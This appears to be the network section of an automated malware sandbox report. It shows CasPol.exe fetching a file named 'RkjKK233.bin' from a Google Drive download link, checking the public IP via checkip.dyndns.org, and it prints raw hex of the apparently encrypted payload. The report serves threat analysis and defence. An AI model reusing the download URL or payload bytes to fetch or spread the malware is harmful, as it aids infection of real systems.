Mar 20, 2023 11:06:11.019073963 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.019124031 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.019321918 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.019366026 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.019397020 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.019431114 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.019659996 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.019710064 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.019920111 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.019932032 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.019980907 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.020198107 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.020242929 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.020272970 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.020441055 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.020483971 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.020680904 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.020755053 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.020803928 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.020924091 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.021091938 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.021136045 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.021337986 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.021384954 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.021435976 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.021657944 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.021657944 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.021733999 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.021912098 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.021913052 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:11.021965027 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.021989107 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.228352070 CET	443	49800	142.250.185.193	192.168.11.20
Mar 20, 2023 11:06:11.228471994 CET	49800	443	192.168.11.20	142.250.185.193
Mar 20, 2023 11:06:12.093276024 CET	49801	80	192.168.11.20	132.226.8.169
Mar 20, 2023 11:06:12.384478092 CET	80	49801	132.226.8.169	192.168.11.20
Mar 20, 2023 11:06:12.384699106 CET	49801	80	192.168.11.20	132.226.8.169
Mar 20, 2023 11:06:12.385241985 CET	49801	80	192.168.11.20	132.226.8.169
Mar 20, 2023 11:06:12.676125050 CET	80	49801	132.226.8.169	192.168.11.20
Mar 20, 2023 11:06:12.676901102 CET	80	49801	132.226.8.169	192.168.11.20
Mar 20, 2023 11:06:12.728343964 CET	49801	80	192.168.11.20	132.226.8.169
Mar 20, 2023 11:07:00.280949116 CET	49801	80	192.168.11.20	132.226.8.169

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 20, 2023 11:06:09.935673952 CET	55851	53	192.168.11.20	1.1.1.1
Mar 20, 2023 11:06:09.945154905 CET	53	55851	1.1.1.1	192.168.11.20
Mar 20, 2023 11:06:10.684120893 CET	52547	53	192.168.11.20	1.1.1.1
Mar 20, 2023 11:06:10.718591928 CET	53	52547	1.1.1.1	192.168.11.20
Mar 20, 2023 11:06:12.076256037 CET	63331	53	192.168.11.20	1.1.1.1
Mar 20, 2023 11:06:12.085616112 CET	53	63331	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 20, 2023 11:06:09.935673952 CET	192.168.11.20	1.1.1.1	0x6c07	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Mar 20, 2023 11:06:10.684120893 CET	192.168.11.20	1.1.1.1	0x372d	Standard query (0)	doc-0s-a8-docs.googleusercontent.com	A (IP address)	IN (0x0001)	false
Mar 20, 2023 11:06:12.076256037 CET	192.168.11.20	1.1.1.1	0x58b7	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 20, 2023 11:06:09.945154905 CET	1.1.1.1	192.168.11.20	0x6c07	No error (0)	drive.google.com		142.250.181.238	A (IP address)	IN (0x0001)	false
Mar 20, 2023 11:06:10.718591928 CET	1.1.1.1	192.168.11.20	0x372d	No error (0)	doc-0s-a8-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 20, 2023 11:06:10.718591928 CET	1.1.1.1	192.168.11.20	0x372d	No error (0)	googlehosted.l.googleusercontent.com		142.250.185.193	A (IP address)	IN (0x0001)	false
Mar 20, 2023 11:06:12.085616112 CET	1.1.1.1	192.168.11.20	0x58b7	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 20, 2023 11:06:12.085616112 CET	1.1.1.1	192.168.11.20	0x58b7	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Mar 20, 2023 11:06:12.085616112 CET	1.1.1.1	192.168.11.20	0x58b7	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Mar 20, 2023 11:06:12.085616112 CET	1.1.1.1	192.168.11.20	0x58b7	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Mar 20, 2023 11:06:12.085616112 CET	1.1.1.1	192.168.11.20	0x58b7	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Mar 20, 2023 11:06:12.085616112 CET	1.1.1.1	192.168.11.20	0x58b7	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

doc-0s-a8-docs.googleusercontent.com

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49799	142.250.181.238	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49800	142.250.185.193	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	49801	132.226.8.169	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
Mar 20, 2023 11:06:12.385241985 CET	368	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Mar 20, 2023 11:06:12.676901102 CET	368	IN	HTTP/1.1 200 OK Date: Mon, 20 Mar 2023 10:06:12 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 33 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.35</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49799	142.250.181.238	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-20 10:06:10 UTC	0	OUT	GET /uc?export=download&id=1XARcr4sm_5_dvnsnsVtsDOfjHfua_08k HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
2023-03-20 10:06:10 UTC	0	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 20 Mar 2023 10:06:10 GMT Location: https://doc-0s-a8-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/mjejjps3gi1cd44ihbckcd43d7dn78od/1679306700000/12467729248612761337//1XARcr4sm_5_dvnsnsVtsDOfjHfua_08k?e=download&uuid=dc7be3b5-c5f0-4bcb-ad3e-a7d72194b047 Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp" Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-f7DVFI7CS3-UrV8E5bTN-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]} Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49800	142.250.185.193	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-20 10:06:10 UTC	1	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/mjejjps3gi1cd44ihbckcd43d7dn78od/1679306700000/12467729248612761337/*/1XARcr4sm_5_dvnsnsVtsDOfjHfua_08k?e=download&uuid=dc7be3b5-c5f0-4bcb-ad3e-a7d72194b047 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-0s-a8-docs.googleusercontent.com Connection: Keep-Alive
2023-03-20 10:06:10 UTC	2	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdtUxiotCr-eS8umlDz2hJGpYTDklciRwgbZCaLNJ85Q7_nE508RQhokXuY5eLEGVxIRTJGtHc9LTDcsdajRlg00kA Content-Type: application/octet-stream Content-Disposition: attachment; filename="RkjKK233.bin"; filename=UTF-8''RkjKK233.bin Access-Control-Allow-Origin: Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token Access-Control-Allow-Methods: GET,HEAD,OPTIONS Content-Length: 130624 Date: Mon, 20 Mar 2023 10:06:10 GMT Expires: Mon, 20 Mar 2023 10:06:10 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=9BUYhA== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2023-03-20 10:06:10 UTC	6	IN	Data Raw: 09 26 e0 f6 59 3c 5a 32 67 5a 63 ad 35 5e c0 e6 5a 50 1a ec fd f5 5e 55 7e 71 e7 38 61 79 a8 3a 57 3d ea 80 40 ac 0a 6d 1f d1 31 32 c0 5c 11 37 9d 72 06 d4 36 f1 e2 56 d8 4d 97 49 30 b1 c4 f2 02 5e 9d 03 42 4d 0a 4e 7b 2f 6c db 7d 52 aa 48 9e 23 9f c5 b2 5e 5f 3a 7b c0 95 f9 1f f2 19 42 6c 09 a5 48 dd a7 bb ab c5 54 9d c2 5c e2 66 4a 72 6d ee b2 8a cf c2 65 95 cb ee 4a e9 6c a5 d1 16 4c 68 30 b7 0d 3f 4b 40 f9 ab 12 67 88 3d 9f 05 f6 f4 de 2f b8 7e 3b f7 c1 03 a3 17 eb 48 d3 51 d9 3f e4 2c 1f 57 07 80 34 3d cf c3 8d e2 68 7a b0 1d 7e 2a 7d 7e d5 c4 d0 3b 19 17 10 b1 cb 6a fb 6d 14 9b 4b b3 7b 99 27 f3 f0 84 52 96 b6 d1 87 d9 5c ce d9 2c a7 c6 26 c9 e9 cd 9d eb 3e cd 88 95 e3 fc 24 f6 2b 59 0e e1 3e 48 38 59 26 f0 e2 bd f5 c3 f7 c0 2e 6d e8 6e ca ac 7f 3e Data Ascii: &Y<Z2gZc5^ZP^U~q8ay:W=@m12\7r6VMI0^BMN{/l}RH#^_:{BlHT\fJrmeJlLh0?K@g=/~;HQ?,W4=hz~*}~;jmK{'R\,&>$+Y>H8Y&.mn>
2023-03-20 10:06:10 UTC	9	IN	Data Raw: 8f 5c bc d2 e7 4d 0e c4 c2 5b 4d 64 ac 29 ad b7 69 36 48 34 15 53 47 cd fb 75 8f 86 18 28 9e fa c7 9c cb cb 1e 67 a5 27 3c ef 4d e5 3a 84 35 0c 5f fe 92 9a a3 d5 0f 2c 6a 97 13 7e 29 1c 78 50 cb 73 a7 3e bb 7e 4e 0b 62 5f d9 06 ac 53 89 bd e9 c6 f9 ea 2d 34 6c 93 1f a1 20 0a 98 79 fa 0e 66 e3 f1 30 fa bd e2 66 71 a3 7d 13 ff c0 76 5d db cc 5b b4 08 5d 96 d3 34 c6 93 18 f2 f1 5c 5e 62 33 10 b4 fe cf 50 04 de 78 7a 99 8d 33 9b 53 21 b4 d8 40 f7 27 b3 9c f3 13 3c af 3a c7 2f 63 25 8c c5 97 6b dd 92 21 20 1e 49 b5 e8 a5 81 6e f6 0a 7e c4 69 71 14 92 ff 39 8b bb 04 a9 33 77 1c 49 d1 38 7a a6 47 ea 15 20 8b 84 8b 47 42 d5 90 f9 b2 bc 3e 56 42 88 11 1c cc 97 e3 07 ed 84 53 3c e8 e8 a7 1c dd 42 99 05 3f de 37 c5 c4 65 0c 29 62 7e ad ac c0 a5 bf 95 18 ef 8b 51 4b Data Ascii: \M[Md)i6H4SGu(g'<M:5_,j~)xPs>~Nb_S-4l yf0fq}v][]4\^b3Pxz3S!@'<:/c%k! In~iq93wI8zG GB>VBS<B?7e)b~QK
2023-03-20 10:06:10 UTC	13	IN	Data Raw: 94 88 77 80 90 ef a3 85 84 36 7a 62 a5 43 dd 6d 4e 2b 38 23 7e fa 90 99 81 43 b5 f3 06 c8 4b 35 2f 8d 18 f5 5f 6b 60 01 13 b7 32 e1 8c e0 71 45 d1 82 19 bb 0f 0d 2d 6c 23 b5 0b e2 e0 88 99 e0 e9 12 df 61 9e 9d 10 89 66 42 c7 de a2 9b e4 fe 12 f4 61 a1 c3 b6 69 12 c0 98 fc d0 97 26 f3 13 64 92 47 d9 61 8b a1 6f 2b 36 e2 8d 86 90 1a 04 41 05 a6 22 1f 72 34 fe ee ca 7b c5 d6 c7 b3 4f 04 07 2b e0 4d 0a 44 0d 86 7f db f2 85 08 48 26 29 b7 64 b2 5e 55 12 54 c0 95 f3 14 f5 13 69 6c 0f 8f 48 dd b4 8b aa c5 43 9d c2 5c c3 66 4a 63 6d c6 b6 8a cf c4 0a 36 cb ee 40 06 c8 a5 d1 12 58 d5 34 9c b9 30 ac 61 52 9a 5f aa be 69 f7 6c a4 d4 ae 4c d7 31 4d 96 ac 25 af d5 85 26 b6 4a 5c 5d 81 06 66 25 63 8b 5d 55 c5 87 d1 81 4a 17 e9 79 1b 04 52 73 df f1 d0 18 19 17 10 b1 cb Data Ascii: w6zbCmN+8#~CK5/_k`2qE-l#afBai&dGao+6A"r4{O+MDH&)d^UTilHC\fJcm6@X40aR_ilL1M%&J\]f%c]UJyRs
2023-03-20 10:06:10 UTC	17	IN	Data Raw: 38 f1 25 43 3b 02 59 c6 d3 f7 b9 cf 74 0b 6b 31 59 71 9f ae 84 43 bf 73 cb 42 25 0e 63 a6 23 c0 19 1c 4e 40 fa c4 48 73 8d 08 0f ae 3a 6a 32 ae 38 30 94 4c 67 1a 47 02 7a 1c d4 45 2e 8d ea f3 f8 aa d6 86 61 fb ab 9c 51 22 ac 84 76 a7 b7 4b 78 4d 25 16 32 f5 d8 f3 76 5d ae 78 22 8d f9 fa 99 8f 1d 1e 7c a3 48 3b 9d d7 f8 2b f0 d1 6e 3e fe 96 b8 e5 fe 0c 26 33 73 05 60 55 7e ba 47 1d 6a cc e8 bf 77 75 bf ad 21 ac fd ec 45 f2 d0 53 c6 f9 e0 5f ae 7b 93 09 76 b0 f5 f7 8c 6a 32 e7 1c 04 cf 3a 65 1d 99 dc 2f 4a ec 46 35 9a a8 19 10 a4 4b b3 d0 59 2e f8 49 7a cf 4c cb 54 5f 72 d2 ef 97 f6 c9 70 29 d4 2c 72 8e e2 fa 9b Data Ascii: 8%C;Ytk1YqCsB%c#N@Hs:j280LgGzE.aQ"vKxM%2v]x"\|H;+n>&3s`U~Gjwu!ES_{vj2:e/JF5KY.IzLT_rp),r
2023-03-20 10:06:10 UTC	17	IN	Data Raw: 53 2b b4 6c 94 03 d8 7c b6 90 38 f5 af 3b d9 d1 60 32 90 45 bd 34 da 80 f7 eb 41 b7 ae f3 2a 81 6e fd 22 5b ce 17 5e ca 54 db 74 ad b1 84 85 22 cf 1c 43 a1 50 9a a0 6f b0 15 31 8b 95 a6 28 8f d5 91 e3 b2 ad 38 39 8d 88 a6 da cc e9 70 06 ed f4 c8 00 eb e8 4e c2 cd 67 a4 31 3f cf 3d d6 e0 35 24 79 68 7e b8 8c ca bd b3 eb 68 f7 8b 55 c1 76 fe 98 8f 68 77 1a ed 68 99 32 00 f1 26 d5 c0 28 bf b2 33 c0 2d 49 55 b5 ae 8a 80 ef bb 44 4a 56 54 f9 6a d4 87 98 0a 2e ae c9 f9 ab 07 6f 61 19 5d 3c e6 97 72 1d 0f 3a 5d 96 29 23 84 20 23 c5 58 a7 db e4 2c 7a 70 48 e6 e6 df 1a 63 46 86 73 44 09 12 8b 1a 18 18 47 ad 29 c3 bb 35 ee c0 72 c4 6b 4f a8 e5 9b df bb 83 f3 c1 07 5d 11 bb fb d1 25 c5 ed 16 39 c4 c3 c7 11 72 6b fc 33 27 0a 30 b5 1e 39 fb 73 c7 e2 a0 df 4d 78 42 77 Data Ascii: S+l\|8;`2E4A*n"[^Tt"CPo1(89pNg1?=5$yh~hUvhwh2&(3-IUDJVTj.oa]<r:])# #X,zpHcFsDG)5rkO]%9rk3'09sMxBw
2023-03-20 10:06:10 UTC	19	IN	Data Raw: c4 ba 61 30 30 27 fc da ef 87 f1 15 7b 7a 01 d9 6b ff 9a 6b 3a 36 87 67 86 96 3a 04 43 33 d7 ac 2f 72 44 d6 7f ca 7b de a4 4b 05 4f 74 25 6c 41 4d 00 21 bd 2f 6c d1 82 bc ac 3a 70 39 9f b5 9a ee 5f 3a 31 b2 0f ee 1f 82 31 2d 6c 09 af 27 1e a7 bb a1 c5 7c f6 c2 5c e4 75 4d 5a 01 ee b2 8c dc ca 74 92 b8 2a 4a 69 66 b6 d8 09 5b a1 fa b7 b9 3c 95 6b 50 ac 31 6f a9 69 fd 7d 8c a6 ac 46 d7 69 37 9b ac 23 c4 5e c3 26 bc 2f 8b b9 97 0c 1d 51 af a0 5d 59 80 40 c2 b1 42 17 ce 7f 74 c1 70 73 d5 f1 da 49 0f 0c 10 c1 b5 37 be 6d 10 ff 0c b0 7b 54 88 7a 85 84 22 e5 70 d1 87 d3 33 e9 d9 2e ac cd 59 be e9 cd 71 99 f6 cd 9c 9f f0 f7 5a d5 2b 17 0d 91 0e 4a 18 29 30 d8 a2 bf f5 c9 e1 7e 2f 7e c4 7f c6 80 71 2f 15 9b 22 8a de ef 88 a0 ec a3 0a e7 f7 48 1d 02 8c 05 5b 1f 70 Data Ascii: a00'{zkk:6g:C3/rD{KOt%lAM!/l:p9_:11-l'\|\uMZt*Jif[<kP1oi}Fi7#^&/Q]Y@BtpsI7m{Tz"p3.YqZ+J)0~/~q/"H[p
2023-03-20 10:06:10 UTC	20	IN	Data Raw: 46 2f 36 dc a6 23 ef 19 0d 58 2f 27 49 77 79 f3 21 2a b8 4c 53 e9 ae 48 98 b1 4a 48 d8 c9 14 70 ce d9 ed 5c 0d f5 81 2c 1e f3 ef 37 b0 ab 9c 5f ef 4b 9e 04 3b b5 63 55 ef 00 0b 5f f6 c9 fb 01 3b 8b 64 5a fc ea eb ee 42 f0 9d 7c a9 53 39 c7 a5 e1 2b 8a a8 0c be fe 92 9a af f6 06 07 41 91 39 60 3e 3d 75 47 a6 63 a3 2f 94 77 7f ae bc 58 c6 11 f4 41 f0 ce f5 c6 89 fc 05 54 6c 93 73 48 21 f4 fd 80 3c e1 e6 1c 0e db 94 29 1d 99 d9 74 af ec 46 35 fb e4 71 33 d4 5c 3a a1 69 2c f9 1c 7a 99 00 cb 54 51 4c 28 ee 84 fb b7 ce 05 d8 37 0a 45 97 33 eb 7b 4e b4 6c b5 76 e8 6d bc 82 7f 69 af 3b d9 af 6d 23 9a 3f bc 61 da 84 d5 83 55 a3 b0 b4 57 81 6e fd 56 35 c4 69 7a c1 54 d8 78 0f a7 84 f1 3e c0 1c 43 a1 3f 51 de 45 ba 15 24 ff af a1 47 46 a6 29 e9 b2 b6 50 ef 43 88 ac Data Ascii: F/6#X/'Iwy!*LSHJHp\,7_K;cU_;dZB\|S9+A9`>=uGc/wXATlsH!<)tF5q3\:i,zTQL(7E3{Nlvmi;m#?aUWnV5izTx>C?QE$GF)PC
2023-03-20 10:06:10 UTC	21	IN	Data Raw: 87 8f e9 f8 94 8e 5f 6b 36 fa 76 9f 45 24 3b 86 73 44 12 3b 9f 40 7f 00 47 d7 98 ef 29 31 e4 e1 61 cc 57 67 2c e5 80 e5 b9 a3 df cd 07 5d 20 3e fb c0 2f c5 d9 af 06 c4 c5 d1 5b 9c 19 dd 2a 27 52 a6 90 09 41 b9 8a c7 e6 08 fa 8b 05 71 48 6e 1c 9e 8b 04 3c 4f 2a b8 d4 ca 8f 42 c1 be 4b 28 d9 87 8d 61 92 96 de 9c 94 8e 63 7c f8 a9 51 82 f3 4e 30 32 30 79 f2 97 b5 9a 4b bc b4 ad c8 4b 39 f9 5f 17 d0 77 4e 66 16 cf ae 34 d8 da f1 74 c1 66 7c 1d 82 07 1d 35 41 ed bd 67 c0 e0 81 93 e0 e6 56 ef 20 c4 a5 20 8b 66 59 c7 de 32 c2 bf d6 9d f4 61 83 4d ba 61 3c 5f 46 f3 ff cd b3 e0 13 1e b0 01 f1 31 81 b2 61 e4 32 e8 8c 86 97 20 04 52 35 a5 23 39 7b 3e fe c0 8e 7b d4 d7 fc 23 4c 04 ec 03 41 4d 25 4e 7f 3e 6c a5 a3 ad aa 4c 54 5b 84 c5 c2 48 77 c0 3b c0 9f f3 19 de 7f Data Ascii: _k6vE$;sD;@G)1aWg,] >/['RAqHn<OBK(ac\|QN020yKK9_wNf4tf\|5AgV fY2aMa<_F1a2 R5#9{>{#LAM%N>lLT[Hw;
2023-03-20 10:06:10 UTC	22	IN	Data Raw: 4a a1 7b 5c 81 ab 93 84 56 9c 9d d1 81 f3 4f 1e dc 2e f7 cd 27 99 ee cd 75 fb 3e cf b4 af e3 fc 2e f6 29 15 f7 e5 9e 48 18 5f 55 56 c2 bf f3 be c4 80 2e 69 ca 71 c7 ae 06 0d 1e 8c 49 3d df ee 82 aa fa a0 96 e7 e6 45 76 59 45 05 5f 17 0b b8 e5 12 5c 79 f5 ed 3e f2 f2 16 54 2a 34 ed 02 ae 20 e7 73 e0 71 a0 04 90 e5 2e a5 b3 fe 79 b5 09 18 81 ee 29 9f 8c 4d b9 13 ea e4 fa 7b b6 15 c8 41 f4 d2 23 3f a3 43 22 82 46 31 34 c0 23 44 cb bc 1d b0 7c f0 b5 4d 9f 86 66 d6 c5 63 f5 19 38 12 a3 59 c6 a6 39 2d cf 7e 1e 03 b3 5e 0f bc ae 84 6c ff c9 eb 46 2e 61 dc 58 22 d9 1d 1c 4d 03 1f c6 33 41 f3 20 0b bd 3b 14 f6 82 20 2b 91 5f 65 22 cb 11 30 44 5d f5 2e 8b 93 15 5c bc d0 99 da 94 ab 9a 5b 4d 6e 84 74 d6 83 63 25 49 26 14 24 d5 51 fb 05 9f a4 53 28 98 da eb 9e e0 c3 Data Ascii: J{\VO.'u>.)H_UV.iqI=EvYE_\y>T*4 sq.y)M{A#?C"F14#D\|Mfc8Y9-~^lF.aX"M3A ; +_e"0D].\[Mntc%I&$QS(
